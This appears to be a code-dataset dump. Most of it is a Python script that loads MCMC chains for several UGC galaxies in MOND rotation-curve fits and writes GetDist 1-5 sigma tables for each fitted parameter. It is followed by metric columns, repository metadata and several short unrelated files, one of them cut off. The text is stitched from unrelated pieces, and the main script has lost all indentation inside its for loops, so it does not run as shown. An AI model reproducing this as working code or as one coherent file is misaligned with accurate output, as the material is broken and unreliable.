samp_UGC10310 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC10310,names = names, labels = labels)
samp_UGC10310.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC10310 = samp_UGC10310.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC10310
low=log10_a0_sol_UGC10310-stats_UGC10310.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC10310.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC10310
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC10310
low=log10_YD_sol_UGC10310-stats_UGC10310.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC10310.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC10310
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC10310
low=df2_sol_UGC10310-stats_UGC10310.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC10310.parWithName('df2').limits[i].upper- df2_sol_UGC10310
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC10310
low=Dinc_sol_UGC10310-stats_UGC10310.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC10310.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC10310
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC10310-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11455 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11455.csv',usecols=[1,2,3,4])
data_array_chain_UGC11455 = numpy.array(full_chain_UGC11455)
mle_soln_UGC11455=[]
for i in range(ndim):
mcmc_UGC11455 = numpy.percentile(data_array_chain_UGC11455[:, i], [16, 50, 84])
q_UGC11455 = numpy.diff(mcmc_UGC11455)
mle_soln_UGC11455.append(mcmc_UGC11455[1])
log10_a0_sol_UGC11455=mle_soln_UGC11455[0]
log10_YD_sol_UGC11455=mle_soln_UGC11455[1]
df2_sol_UGC11455=mle_soln_UGC11455[2]
Dinc_sol_UGC11455=mle_soln_UGC11455[3]
samp_UGC11455 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11455,names = names, labels = labels)
samp_UGC11455.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11455 = samp_UGC11455.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11455
low=log10_a0_sol_UGC11455-stats_UGC11455.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11455
low=log10_YD_sol_UGC11455-stats_UGC11455.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11455
low=df2_sol_UGC11455-stats_UGC11455.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('df2').limits[i].upper- df2_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11455
low=Dinc_sol_UGC11455-stats_UGC11455.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11455.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11455
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11455-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11557 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11557.csv',usecols=[1,2,3,4])
data_array_chain_UGC11557 = numpy.array(full_chain_UGC11557)
mle_soln_UGC11557=[]
for i in range(ndim):
mcmc_UGC11557 = numpy.percentile(data_array_chain_UGC11557[:, i], [16, 50, 84])
q_UGC11557 = numpy.diff(mcmc_UGC11557)
mle_soln_UGC11557.append(mcmc_UGC11557[1])
log10_a0_sol_UGC11557=mle_soln_UGC11557[0]
log10_YD_sol_UGC11557=mle_soln_UGC11557[1]
df2_sol_UGC11557=mle_soln_UGC11557[2]
Dinc_sol_UGC11557=mle_soln_UGC11557[3]
samp_UGC11557 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11557,names = names, labels = labels)
samp_UGC11557.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11557 = samp_UGC11557.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11557
low=log10_a0_sol_UGC11557-stats_UGC11557.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11557
low=log10_YD_sol_UGC11557-stats_UGC11557.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11557
low=df2_sol_UGC11557-stats_UGC11557.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('df2').limits[i].upper- df2_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11557
low=Dinc_sol_UGC11557-stats_UGC11557.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11557.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11557
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11557-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11820 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11820.csv',usecols=[1,2,3,4])
data_array_chain_UGC11820 = numpy.array(full_chain_UGC11820)
mle_soln_UGC11820=[]
for i in range(ndim):
mcmc_UGC11820 = numpy.percentile(data_array_chain_UGC11820[:, i], [16, 50, 84])
q_UGC11820 = numpy.diff(mcmc_UGC11820)
mle_soln_UGC11820.append(mcmc_UGC11820[1])
log10_a0_sol_UGC11820=mle_soln_UGC11820[0]
log10_YD_sol_UGC11820=mle_soln_UGC11820[1]
df2_sol_UGC11820=mle_soln_UGC11820[2]
Dinc_sol_UGC11820=mle_soln_UGC11820[3]
samp_UGC11820 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11820,names = names, labels = labels)
samp_UGC11820.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11820 = samp_UGC11820.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11820
low=log10_a0_sol_UGC11820-stats_UGC11820.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11820
low=log10_YD_sol_UGC11820-stats_UGC11820.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11820
low=df2_sol_UGC11820-stats_UGC11820.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('df2').limits[i].upper- df2_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11820
low=Dinc_sol_UGC11820-stats_UGC11820.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11820.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11820
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11820-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC11914 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC11914.csv',usecols=[1,2,3,4,5])
data_array_chain_UGC11914 = numpy.array(full_chain_UGC11914)
mle_soln_UGC11914=[]
for i in range(ndim_with_bulge):
mcmc_UGC11914 = numpy.percentile(data_array_chain_UGC11914[:, i], [16, 50, 84])
q_UGC11914 = numpy.diff(mcmc_UGC11914)
mle_soln_UGC11914.append(mcmc_UGC11914[1])
log10_a0_sol_UGC11914=mle_soln_UGC11914[0]
log10_YD_sol_UGC11914=mle_soln_UGC11914[1]
log10_YB_sol_UGC11914=mle_soln_UGC11914[2]
df2_sol_UGC11914=mle_soln_UGC11914[3]
Dinc_sol_UGC11914=mle_soln_UGC11914[4]
samp_UGC11914 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC11914,names = names_with_bulge, labels = labels_with_bulge)
samp_UGC11914.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC11914 = samp_UGC11914.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC11914
low=log10_a0_sol_UGC11914-stats_UGC11914.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC11914
low=log10_YD_sol_UGC11914-stats_UGC11914.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YB.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YB_sol_str='%s'%log10_YB_sol_UGC11914
low=log10_YB_sol_UGC11914-stats_UGC11914.parWithName('log10_YB').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('log10_YB').limits[i].upper- log10_YB_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-log10_YB.txt', 'a')
text_file.write(log10_YB_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC11914
low=df2_sol_UGC11914-stats_UGC11914.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('df2').limits[i].upper- df2_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC11914
low=Dinc_sol_UGC11914-stats_UGC11914.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC11914.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC11914
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC11914-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC12506 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC12506.csv',usecols=[1,2,3,4])
data_array_chain_UGC12506 = numpy.array(full_chain_UGC12506)
mle_soln_UGC12506=[]
for i in range(ndim):
mcmc_UGC12506 = numpy.percentile(data_array_chain_UGC12506[:, i], [16, 50, 84])
q_UGC12506 = numpy.diff(mcmc_UGC12506)
mle_soln_UGC12506.append(mcmc_UGC12506[1])
log10_a0_sol_UGC12506=mle_soln_UGC12506[0]
log10_YD_sol_UGC12506=mle_soln_UGC12506[1]
df2_sol_UGC12506=mle_soln_UGC12506[2]
Dinc_sol_UGC12506=mle_soln_UGC12506[3]
samp_UGC12506 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC12506,names = names, labels = labels)
samp_UGC12506.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC12506 = samp_UGC12506.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC12506
low=log10_a0_sol_UGC12506-stats_UGC12506.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC12506
low=log10_YD_sol_UGC12506-stats_UGC12506.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC12506
low=df2_sol_UGC12506-stats_UGC12506.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('df2').limits[i].upper- df2_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC12506
low=Dinc_sol_UGC12506-stats_UGC12506.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC12506.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC12506
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12506-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
full_chain_UGC12632 = pd.read_csv('/home/alefe/Cluster/MOND_outputs/chain_UGC12632.csv',usecols=[1,2,3,4])
data_array_chain_UGC12632 = numpy.array(full_chain_UGC12632)
mle_soln_UGC12632=[]
for i in range(ndim):
mcmc_UGC12632 = numpy.percentile(data_array_chain_UGC12632[:, i], [16, 50, 84])
q_UGC12632 = numpy.diff(mcmc_UGC12632)
mle_soln_UGC12632.append(mcmc_UGC12632[1])
log10_a0_sol_UGC12632=mle_soln_UGC12632[0]
log10_YD_sol_UGC12632=mle_soln_UGC12632[1]
df2_sol_UGC12632=mle_soln_UGC12632[2]
Dinc_sol_UGC12632=mle_soln_UGC12632[3]
samp_UGC12632 = getdist.mcsamples.MCSamples(samples=data_array_chain_UGC12632,names = names, labels = labels)
samp_UGC12632.updateSettings({'contours': [0.682689492137086, 0.954499736103642,0.997300203936740,0.999936657516334,0.999999426696856]})
stats_UGC12632 = samp_UGC12632.getMargeStats()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_a0.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_a0_sol_str='%s'%log10_a0_sol_UGC12632
low=log10_a0_sol_UGC12632-stats_UGC12632.parWithName('log10_a0').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('log10_a0').limits[i].upper- log10_a0_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_a0.txt', 'a')
text_file.write(log10_a0_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_YD.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
log10_YD_sol_str='%s'%log10_YD_sol_UGC12632
low=log10_YD_sol_UGC12632-stats_UGC12632.parWithName('log10_YD').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('log10_YD').limits[i].upper- log10_YD_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-log10_YD.txt', 'a')
text_file.write(log10_YD_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-df2.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
df2_sol_str='%s'%df2_sol_UGC12632
low=df2_sol_UGC12632-stats_UGC12632.parWithName('df2').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('df2').limits[i].upper- df2_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-df2.txt', 'a')
text_file.write(df2_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-Dinc.txt', 'w')
text_file.write('max s- s+ - rows are 1,2,3,4,5 sigmas\n')
text_file.close()
for i in range(5):
Dinc_sol_str='%s'%Dinc_sol_UGC12632
low=Dinc_sol_UGC12632-stats_UGC12632.parWithName('Dinc').limits[i].lower
low_str='%s'%low
up=stats_UGC12632.parWithName('Dinc').limits[i].upper- Dinc_sol_UGC12632
up_str='%s'%up
text_file = open('/home/alefe/Cluster/MOND_GetDist_corner/UGC12632-sigmatab-Dinc.txt', 'a')
text_file.write(Dinc_sol_str + ',' + low_str + ',' + up_str + '\n')
text_file.close()
| 44.012414 | 136 | 0.751393 | 17,070 | 102,813 | 4.220152 | 0.010076 | 0.081957 | 0.061301 | 0.076626 | 0.869152 | 0.790097 | 0.762528 | 0.716178 | 0.715012 | 0.667245 | 0 | 0.143353 | 0.0896 | 102,813 | 2,335 | 137 | 44.031263 | 0.626275 | 0.001965 | 0 | 0.462617 | 0 | 0 | 0.261098 | 0.178412 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009346 | 0 | 0.009346 | 0.001038 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d186b3e5b9494bc4144cf5bcb8328e00161a73d8 | 145 | py | Python | Ejercicios/Maximo Recursivo/maximo.py | FR98/Cuarto-Compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
] | 1 | 2022-03-20T12:57:04.000Z | 2022-03-20T12:57:04.000Z | Ejercicios/Maximo Recursivo/maximo.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
] | null | null | null | Ejercicios/Maximo Recursivo/maximo.py | FR98/cuarto-compu | 3824d0089562bccfbc839d9979809bc7a0fe4684 | [
"MIT"
] | null | null | null | def maximo(lista):
if len(lista) == 1:
return lista[0]
if lista[0] > maximo(lista[1:]):
return lista[0]
else:
return maximo(lista[1:])
| 16.111111 | 33 | 0.627586 | 24 | 145 | 3.791667 | 0.375 | 0.362637 | 0.263736 | 0.373626 | 0.395604 | 0 | 0 | 0 | 0 | 0 | 0 | 0.050847 | 0.186207 | 145 | 8 | 34 | 18.125 | 0.720339 | 0 | 0 | 0.285714 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0 | 0 | 0.571429 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 6 |
d1c577819639e104619309bbc1fdbba5b042f6ac | 36 | py | Python | testify/errors.py | bukzor/Testify | e0054959b9be13851b937ec90533c183e9b2ba71 | [
"Apache-2.0"
] | 1 | 2020-12-18T01:07:23.000Z | 2020-12-18T01:07:23.000Z | testify/errors.py | dnephin/Testify | 9005a8866cbf099c26e6fbd74c3e2640a581a55b | [
"Apache-2.0"
] | null | null | null | testify/errors.py | dnephin/Testify | 9005a8866cbf099c26e6fbd74c3e2640a581a55b | [
"Apache-2.0"
] | null | null | null | class TestifyError(Exception): pass
| 18 | 35 | 0.833333 | 4 | 36 | 7.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.083333 | 36 | 1 | 36 | 36 | 0.909091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 1 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 6 |
d1d17a4382ff8f330d67a4e6b6ba0f9e76e8f2e2 | 39 | py | Python | test/integration/expected_out_single_line/percent_strings.py | Inveracity/flynt | b975b6f61893d5db1114d68fbb5d212c4e11aeb8 | [
"MIT"
] | 487 | 2019-06-10T17:44:56.000Z | 2022-03-26T01:28:19.000Z | test/integration/expected_out_single_line/percent_strings.py | Inveracity/flynt | b975b6f61893d5db1114d68fbb5d212c4e11aeb8 | [
"MIT"
